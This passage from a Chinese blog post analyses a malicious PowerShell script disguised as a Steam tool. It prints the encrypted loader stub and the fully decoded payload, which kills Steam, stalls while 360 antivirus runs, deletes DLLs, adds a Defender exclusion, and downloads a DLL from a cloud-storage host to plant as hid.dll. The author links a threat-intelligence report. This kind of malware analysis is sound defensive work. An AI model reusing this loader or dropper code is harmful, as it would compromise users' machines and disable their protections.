Z8e7k4T8cTsgLhn62yWKOssUrcZs7Ksz1OaW1/xI8pmZhich0REGSMSGkoG27Ke8sPrzCznSoFN/1inw6CY7ZpcEWA9J4PV/YRzHNwza7mAuSvPBoALZ0PxXALFPd0VK6wVDsJd8SrqdtKgj98LppI1i2PDvTyRT7jP8Ky1LbqhXeknLGme8cbRd43T5cLjRiUn6eZTGAbYWYDVPVzsleN6xZLuKUfKTME6VoT6542XkANA0VivDcOam684L2UX5MOfFayrpGebhUCguIEKZece6C0CGUlw61h4vR6nEZ9Xfc583ZbzNHMd8+p/yHaYWcKeoB84DvwVs1FhO+YbyKtptqtkzWh1LmrcVAOqk/jIluH9KkRVdEjAHmh6WcQoc05+S7Q2elOmQnhDC2LmAf5tXo6jUW0qPxD5B531s+b0gG1ak4aOye+mvlWOPTxcpdtdGu9xwW2I7e+bErWd/T87z7obI3o5/MoBm2ZYPp/Db3nDgalTW4pXpcUz3dS5TQp9bjzGGyJQvaG98s0jAgrFOtIAgmGBRz/RmvzOgM4+ruQNXyA+C4Ijwoe4tSBpRvkVCdr4QW8nEOPGhlOIl8UZv38UisqQzUeC+xVOaa4fPNkTDoM/XfSlhcJs8s4LRA/6WlEgQ53lBY7Myczu07Bp55Lqjy7dGgD6fRxNvd7/LX+AvAuT62+Ke33ySdIJqQDMoK1AdPWRMXLt6Id1mNgRTfOYA9FZYk/SM+cHErUOJdsj87IAg/qiodxl0HKLV1EGfBCJhVoG2P65gFVGT1QEjvx5w8fUJo9QHK4Pj0H6XKi5CbIViN16H0PY8dC7q5U9XJZRthfMPhcpoFrsU7KjRmCzwHu7opB5i2D473LcpIE7dJjPKAUflUWSw4N/QEj0DrcXNUjx0k52+GIkFX3zpvvhpauJ08rkNe7qMleXaqIZh4cZbip3Zl+VsbVulsJ8ErtwPSafhwF/qUIYdZ/5Qu+EVza7mBe1oOfKUv1zBeNgyH/MR1g5zMfiXiF54jMsrFHFriH9SjCIRQnqQkcXKI6TuThQ0Se37AzHf+0=")$atvt = [System.Convert]::FromBase64String("hkdA0VhDg/YC4GeQ12rHb4ahi/6KnLO0YA1GbJ13lBU=")$regwqbe.IV = $rhfxkezu[0..15]$regwqbe.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7$regwqbe.Mode = [System.Security.Cryptography.CipherMode]::ECB$regwqbe.KeySize = 128$regwqbe.Key = $atvt$regwqbe.BlockSize = 128$joiphp = New-Object System.IO.MemoryStream(,$regwqbe.CreateDecryptor().TransformFinalBlock($rhfxkezu,16,$rhfxkezu.Length-16))$giaait = New-Object System.IO.MemoryStream$cnuskgam = New-Object System.IO.Compression.GzipStream $joiphp, ([IO.Compression.CompressionMode]::Decompress)$cnuskgam.CopyTo($giaait)$vndjspend = [System.Text.Encoding]::UTF8.GetString($giaait.ToArray())$cnuskgam.Close()$joiphp.Close()$regwqbe.Dispose()Invoke-Expression($vndjspend)

然后我们再用chatgpt进行分析,好家伙继续套娃。

图片

我们把Invoke-Expression($vndjspend)改成echo $vndjspend输出加密内容,然后powershell执行一下。

图片

PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\00\Desktop\66.ps1

图片

好家伙还继续套娃,我们继续解,直到后面解开为止。

图片

图片

解开代码了,我们来看看它到底想干嘛!

Write-Host -NoNewline "          _____                _____                    _____                    _____         _____          `r" -ForegroundColor:blueWrite-Host -NoNewline "         /\    \              /\    \                  /\    \                  /\    \        /\    \         `r" -ForegroundColor:blueWrite-Host -NoNewline "        /::\    \            /::\    \                /::\    \                /::\    \       /::\____\        `r" -ForegroundColor:blueWrite-Host -NoNewline "       /::::\    \           \:::\    \              /::::\    \              /::::\    \              /::::|   |        `r" -ForegroundColor:blueWrite-Host -NoNewline "      /::::::\    \           \:::\    \            /::::::\    \            /::::::\    \            /:::::|   |        `r" -ForegroundColor:blueWrite-Host -NoNewline "     /:::/\:::\    \           \:::\    \          /:::/\:::\    \          /:::/\:::\    \          /::::::|   |        `r" -ForegroundColor:blueWrite-Host -NoNewline "    /:::/__\:::\    \           \:::\    \        /:::/__\:::\    \        /:::/__\:::\    \        /:::/|::|   |        `r" -ForegroundColor:blueWrite-Host -NoNewline "    \:::\   \:::\    \          /::::\    \      /::::\   \:::\    \      /::::\   \:::\    \      /:::/ |::|   |        `r" -ForegroundColor:blueWrite-Host -NoNewline "  ___\:::\   \:::\    \        /::::::\    \    /::::::\   \:::\    \    /::::::\   \:::\    \    /:::/  |::|___|______  `r" -ForegroundColor:blueWrite-Host -NoNewline " /\   \:::\   \:::\    \      /:::/\:::\    \  /:::/\:::\   \:::\    \  /:::/\:::\   \:::\    \  /:::/   |::::::::\    \ `r" -ForegroundColor:blueWrite-Host -NoNewline "/::\   \:::\   \:::\____\    /:::/  \:::\____\/:::/__\:::\   \:::\____\/:::/  \:::\   \:::\____\/:::/    |:::::::::\____\`r" -ForegroundColor:blueWrite-Host -NoNewline "\:::\   \:::\   \::/    /   /:::/    \::/    /\:::\   \:::\   \::/    /\::/    \:::\  /:::/    /\::/    / ~~~~~/:::/    /`r" -ForegroundColor:blueWrite-Host -NoNewline " \:::\   \:::\   \/____/   /:::/    / \/____/  \:::\   \:::\   \/____/  \/____/ \:::\/:::/    /  \/____/      /:::/    / `r" -ForegroundColor:blueWrite-Host -NoNewline "  \:::\   \:::\    \      /:::/    /            \:::\   \:::\    \               \::::::/    /               /:::/    /  `r" -ForegroundColor:blueWrite-Host -NoNewline "   \:::\   \:::\____\    /:::/    /              \:::\   \:::\____\               \::::/    /               /:::/    /   `r" -ForegroundColor:blueWrite-Host -NoNewline "    \:::\  /:::/    /    \::/    /                \:::\   \::/    /               /:::/    /               /:::/    /    `r" -ForegroundColor:blueWrite-Host -NoNewline "     \:::\/:::/    /      \/____/                  \:::\   \/____/               /:::/    /               /:::/    /     `r" -ForegroundColor:blueWrite-Host -NoNewline "      \::::::/    /                                 \:::\    \                  /:::/    /               /:::/    /      `r" -ForegroundColor:blueWrite-Host -NoNewline "       \::::/    /                                   \:::\____\                /:::/    /               /:::/    /       `r" -ForegroundColor:blueWrite-Host -NoNewline "        \::/    /                                     \::/    /                \::/    /       \::/    /        `r" -ForegroundColor:blueWrite-Host -NoNewline "         \/____/                                       \/____/                  \/____/        \/____/         `r" -ForegroundColor:blue
function Get-RandomString() {    param(    [int]$length=10,    #      [int]      ָ    [char[]]$sourcedata    )
    for($loop=1; $loop -le $length; $loop++) {        $TempPassword+=($sourcedata | GET-RANDOM | %{[char]$_})    }
    return $TempPassword}
Start-Sleep 1$tempLog = $env:TEMP+ "\log.txt"
try{    irm -Uri "https://hz-config.oss-accelerate.aliyuncs.com/help.txt" -OutFile $tempLog}catch{    Write-Host "NetWork Result-Error" -ForegroundColor:red}
function PwStart() {    try    {        $steamPath = (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Valve\Steam\ActiveProcess" -ErrorAction Stop).'SteamClientDll'        $steamPath = $steamPath -replace "steamclient.dll","hid.dll"
        if(Get-Process 360Tray* -ErrorAction Stop){            while(Get-Process 360Tray* -ErrorAction Stop){                Write-Host (Get-Content $tempLog)[0] -ForegroundColor:Red                Start-Sleep 1.5            }            PwStart
        }        elseif(Get-Process 360sd* -ErrorAction Stop)        {            while(Get-Process 360sd* -ErrorAction Stop){                Write-Host (Get-Content $tempLog)[1] -ForegroundColor:Red                Start-Sleep 1.5            }            PwStart        }        else{            try{                Stop-Process -Name steam* -Force -ErrorAction Stop                Start-Sleep 1

                if(Get-Process steam* -ErrorAction Stop){                    TASKKILL /F /IM "steam.exe" | Out-Null                    Start-Sleep 2                }

                if (Test-Path $steamPath) {                    Start-Sleep 1                    del $steamPath                    if (Test-Path $steamPath)                    {                        Remove-Item -Path $steamPath -Force                        Start-Sleep 1                    }                    Start-Sleep 0.5                }                $steamPath = $steamPath -replace "hid.dll","version.dll"                if (Test-Path $steamPath) {                    Start-Sleep 0.5                    Remove-Item -Path $steamPath -Force                    Start-Sleep 0.5                }                $steamPath = $steamPath -replace "version.dll","user32.dll"                if (Test-Path $steamPath) {                    Start-Sleep 0.5                    Remove-Item -Path $steamPath -Force                    Start-Sleep 0.5                }                $steamPath = $steamPath -replace "user32.dll","hid.dll"
                Write-Host "ServerStart        [OK]" -ForegroundColor:green                try                {                    Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop                    Start-Sleep 1                    # Set-MpPreference -SubmitSamplesConsent 0 -ErrorAction Stop                }                catch                {                }                Write-Host "Result[0]          [OK]" -ForegroundColor:green
                Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/PSH" -OutFile $steamPath -ErrorAction Stop
                Write-Host "Result[1]          [OK]" -ForegroundColor:green
                $strfmt = -join ($env:LOCALAPPDATA,"\Microsoft\Tencent")                if ((Test-Path $strfmt)) {                    rmdir -Recurse $strfmt | Out-Null                    Start-Sleep 1                    if ((Test-Path $strfmt)) {                        Remove-Item -Path $strfmt -Force -Recurse | Out-Null                    }                }
                $strfmt = -join ($env:LOCALAPPDATA,"\SteamActive")                if (!(Test-Path $strfmt)) {                    md $strfmt | Out-Null                    Start-Sleep 1                    if (!(Test-Path $strfmt)) {                        New-Item $strfmt -ItemType directory -Force | Out-Null                    }                }
                $strfmt = -join ($env:LOCALAPPDATA,"\SteamActive\hid")                Invoke-WebRequest -Uri "https://hz-config.oss-accelerate.aliyuncs.com/dwf/hid" -OutFile $strfmt -ErrorAction Stop                Write-Host "Result[2]          [OK]" -ForegroundColor:green
                Start-Sleep 0.5
                Start steam://

                Write-Host (Get-Content $tempLog)[3] -ForegroundColor:green
                Start-Sleep 5

                exit            }            catch            {                Write-Host (Get-Content $tempLog)[2] -ForegroundColor:Red            }
        }
    }    catch{
        Write-Host (Get-Content $tempLog)[4] -ForegroundColor:red    }}

 

图片

可以看到它直接把360给干掉,对一些dll文件进行修改和删除,估计想dll注入,我们把它oss的文件下载下来,丢入微步进行分析。

图片PSH文件直接报毒https://s.threatbook.com/report/file/0e346983d60d9eaac363993c09285609af7fa1a461c3fb92659dc7936f68cddd图片

HID文件还好,但是不排除图片

 

posted @ 2023-11-14 11:39  达达尼亚2017  阅读(1025)  评论(1编辑  收藏  举报